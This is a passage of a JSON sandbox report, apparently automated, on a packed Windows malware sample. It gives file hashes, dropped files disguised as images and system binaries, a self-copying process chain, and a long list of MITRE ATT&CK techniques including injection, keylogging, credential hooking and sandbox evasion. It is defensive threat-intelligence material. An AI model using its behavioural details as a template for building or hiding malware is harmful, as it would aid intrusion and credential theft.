executable (DLL) (GUI) Intel 80386, for MS Windows", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_path": "C:\\MFILES\\winlogon.exe", "file_size": 73023, "sha256": "1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "gbvxvm.jpg", "file_path": "C:\\gbvxvm.jpg", "file_size": 77, "sha256": "4ddc50428667b68c134b771f23b6e2ea4b84f9867051b322280167feed4c638b", "type_tags": ["url"], "description": "MS Windows 95 Internet shortcut text, ASCII text, with CRLF line terminators", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "mfvqlr.bmp", "file_path": "C:\\mfvqlr.bmp", "file_size": 87, "sha256": "cd3bcb176d5e818be185212cfab9df0ce6a7e1f146050ec345aecd849fb2abc0", "type_tags": ["url"], "description": "MS Windows 95 Internet shortcut text, ASCII text, with CRLF line terminators", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "qdcrwv.txt", "file_path": "C:\\qdcrwv.txt", "file_size": 813, "sha256": "7b644f31d113639d42e7760a772cfe1e62c15d326816ae301c1aa51928a4d76a", "type_tags": ["lnk"], "description": "MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Fri Jul 2 01:50:58 2010, mtime=Fri Jul 9 08:01:36 2010, atime=Tue Aug 17 12:00:00 2004, length=93184, window=hide", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ttdmri.gif", "file_path": "C:\\ttdmri.gif", "file_size": 77, "sha256": "020bb4dcfcfa9f205079c7c3210957c24df380579ef76e748192dff1df191f6d", "type_tags": ["url"], "description": "MS Windows 95 Internet shortcut text, ASCII text, with CRLF line terminators", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "7ea73395fd012c3dbeff3d3e036b5db2653fca19edeb4237c9191fb34abe77f6", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A9C787.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005784", "name": "1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe", "normalized_path": "C:\\1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe", "sha256": "1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a"}, {"uid": "00000000-00005848", "parentuid": "00000000-00005784", "name": "explorer.exe", "normalized_path": "%COMMONPROGRAMFILES%\\Microsoft Shared\\explorer.exe", "sha256": "1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 16}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Image File Execution Options Injection", "attck_id": "T1546.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/012", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Image File Execution Options Injection", "attck_id": "T1546.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/012", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 16}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 4, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Manipulation", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"CopyFileA\" to copy C:\\1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe to new location %COMMONPROGRAMFILES%\\Microsoft Shared\\explorer.exe (UID: 00000000-00005784)\n \"explorer.exe\" called \"CopyFileA\" to copy %COMMONPROGRAMFILES%\\Microsoft Shared\\explorer.exe to new location C:\\MFILES\\winlogon.exe (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", 